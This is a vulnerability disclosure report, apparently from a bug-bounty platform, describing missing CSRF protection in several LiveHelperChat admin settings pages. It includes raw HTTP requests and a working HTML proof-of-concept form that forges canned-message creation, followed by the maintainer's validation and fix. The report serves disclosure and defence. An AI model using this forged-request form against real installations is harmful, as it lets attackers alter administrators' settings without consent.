Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Jan 14th 2022

Description

A CSRF issue is found in the Settings>Live help configuration>Canned Messages. It was found that no CSRF token validation is getting done as no CSRF token is getting passed with the request. Also while generating statistics, the action is done through GET method with no CSRF token.

Two more instances were found where CSRF token validation is not being done, one in Notification settings under Settings>Live help configuration>Notification settings and the other in group chat options under Settings>Live help configuration>Group chat option.

Proof of Concept

Request for canned messages

POST /site_admin/chat/newcannedmsg HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/newcannedmsg
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=5j5o8v6g4ut9ci9bsc07kuco6f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Title=abcd&Tags=abcd&ExplainHover=&Delay=0&Position=0&cannedDepartmentGroup=0&Message=&FallbackMessage=&HTMLSnippet=&MessageExtFB=&FallbackMessageExtFB=&repetitiveness=0&active_from=2022-01-13T11%3A41&active_to=2022-01-13T11%3A41&modStartTime=00%3A00&modEndTime=00%3A00&tudStartTime=00%3A00&tudEndTime=00%3A00&wedStartTime=00%3A00&wedEndTime=00%3A00&thdStartTime=00%3A00&thdEndTime=00%3A00&frdStartTime=00%3A00&frdEndTime=00%3A00&sadStartTime=00%3A00&sadEndTime=00%3A00&sudStartTime=00%3A00&sudEndTime=00%3A00&Save_action=Save

You can see that NO CSRF token is getting sent along with the request.

Another request to generate statistics is done using the GET method.

GET /site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/chat/cannedmsg/(tab)/statistic?doSearch=1&timefrom=&timefrom_hours=&timefrom_minutes=&timeto=&timeto_hours=&timeto_minutes=&doSearch=Generate
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Request notification settings where CSRF token validation is not being done.


POST /site_admin/notifications/settings HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/notifications/settings
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&enabled=on&subject=&http_host=demo.livehelperchat.com&icon=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&badge=https%3A%2F%2Fdemo.livehelperchat.com%2Fdesign%2Fdefaulttheme%2Fimages%2Fgeneral%2Flogo.png&vibrate=&public_key=%22%3E%3Cabcdddd&private_key=%22%3E%3Cabbbcd&StoreOptions=Save

Request group chat options where CSRF token validation not done


POST /site_admin/groupchat/options HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/groupchat/options
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; lhc_vid=c30bd644217e77d30f71; PHPSESSID=f0n57mdtep2e09dghse31ie79e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&supervisor=3&StoreOptions=Save

Below is an example POC to exploit the above issues.

CSRF POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/chat/newcannedmsg" method="POST">
      <input type="hidden" name="Title" value="abcd" />
      <input type="hidden" name="Tags" value="abcd" />
      <input type="hidden" name="ExplainHover" value="" />
      <input type="hidden" name="Delay" value="0" />
      <input type="hidden" name="Position" value="0" />
      <input type="hidden" name="cannedDepartmentGroup" value="0" />
      <input type="hidden" name="Message" value="" />
      <input type="hidden" name="FallbackMessage" value="" />
      <input type="hidden" name="HTMLSnippet" value="" />
      <input type="hidden" name="MessageExtFB" value="" />
      <input type="hidden" name="FallbackMessageExtFB" value="" />
      <input type="hidden" name="repetitiveness" value="0" />
      <input type="hidden" name="active&#95;from" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="active&#95;to" value="2022&#45;01&#45;13T11&#58;41" />
      <input type="hidden" name="modStartTime" value="00&#58;00" />
      <input type="hidden" name="modEndTime" value="00&#58;00" />
      <input type="hidden" name="tudStartTime" value="00&#58;00" />
      <input type="hidden" name="tudEndTime" value="00&#58;00" />
      <input type="hidden" name="wedStartTime" value="00&#58;00" />
      <input type="hidden" name="wedEndTime" value="00&#58;00" />
      <input type="hidden" name="thdStartTime" value="00&#58;00" />
      <input type="hidden" name="thdEndTime" value="00&#58;00" />
      <input type="hidden" name="frdStartTime" value="00&#58;00" />
      <input type="hidden" name="frdEndTime" value="00&#58;00" />
      <input type="hidden" name="sadStartTime" value="00&#58;00" />
      <input type="hidden" name="sadEndTime" value="00&#58;00" />
      <input type="hidden" name="sudStartTime" value="00&#58;00" />
      <input type="hidden" name="sudEndTime" value="00&#58;00" />
      <input type="hidden" name="Save&#95;action" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can help an attacker to create canned messages, change notification settings and group chat options.

We are processing your report and will contact the livehelperchat team within 24 hours. a year ago

shubh123-tri modified the report

a year ago

We have contacted a member of the livehelperchat team and are waiting to hear back a year ago

Remigijus Kiminas validated this vulnerability a year ago

shubh123-tri has been awarded the disclosure bounty

The fix bounty is now up for grabs

Remigijus Kiminas marked this as fixed in 2.0 with commit c2fa19 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Remigijus Kiminas Remigijus

commented a year ago

Maintainer

The statistic URL was not changed. As it's gets data and does not modify it.

to join this conversation